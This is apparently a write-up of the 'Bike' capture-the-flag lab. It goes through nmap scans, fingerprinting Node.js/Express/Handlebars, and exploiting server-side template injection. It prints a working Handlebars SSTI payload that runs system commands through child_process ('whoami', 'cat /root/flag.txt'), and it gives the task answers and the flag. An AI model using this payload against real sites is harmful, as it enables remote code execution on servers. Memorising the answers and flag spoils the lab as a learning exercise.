Bike

Task 1: What TCP ports does nmap identify as open? Answer with a list of ports separated by commas with no spaces, from low to high.

  • Run quick nmap scan:

nmap [Target IP]
  • This shows that ports 22 & 80 are open.

Task 2: What software is running the service listening on the http/web port identified in the first question?

  • Nmap version scan on port 80:

nmap -sV -p 80 [Target IP]
  • The answer is Node.js

Task 3: What is the name of the Web Framework according to Wappalyzer?

  • Open the target IP in your web browser.

  • Make sure to have the Wappalyzer extension installed on your browser.

  • Once on the target page, check the Wappalyzer analysis.

  • It shows Express as the Web Framework

Task 4: What is the name of the vulnerability we test for by submitting {{7*7}}?

  • Check the first part of the walkthrough given with the machine. This machine is based on server side template injection.

Task 5: What is the templating engine being used within Node.JS?

  • On the web page of the target IP submit {{7*7}} as a response to the email address form.

  • This will take you to an error page.

  • I browsed this page for a bit and found a reference in there to handlebars

Task 6: What is the name of the BurpSuite tab used to encode text?

  • Opening up Burpsuite I found that the tab is called "Decoder"

Task 7: In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?

  • On the decoder tab of burpsuite you can use the drop down menu to see the different types of encoding.

  • The answer is URL

Task 8: When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?

  • Navigate to the Hacktricks URL and more specifically the section on SSTI and Node.JS Handlebars

  • There is a script to exploit the form. You can either URL encrypt the scrypt yourself or grab the already URL-encrypted script at the bottom.

    • Turn on FoxyProxy and input the URL encoded script into the email form of the target web page and submit.

    • The request should have been captured. From here, send the capture in Burpsuite to the Repeater.

    • Click send and you should capture a response page with an error at the top.

    • The error is going to specify that "Require" is not defined.

Task 9: What variable is the name of the top-level scope in Node.JS?

  • Reading through the walkthrough guide, I learned that the variable with the top-level scope is "Global".

    • This makes sense as global variable are applied throughout for other languages as well.

Task 10: By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

  • Start with the initial script from hacktricks.

  • We will modify this script and then URL encode it.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
  • After you have modified the script, URL encode it and send it through Burpsuites Repeater.

  • You should get a response back that the user is "root"

Capture the Flag:

  • Since we know the code above works, we can modify it again. We can either upload a reverse shell or just look for the flag.

    • In this case we will just look for the flag while modifying the script above. Normally though we would start a reverse shell and look through our host machine as that would be easier to navigate.

  • In this case the flag is relatively easy to locate.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
  • It is located in the /root directory under flag.txt.

  • The flag is "6b258d726d287462d60c103d0142a81c"

Last updated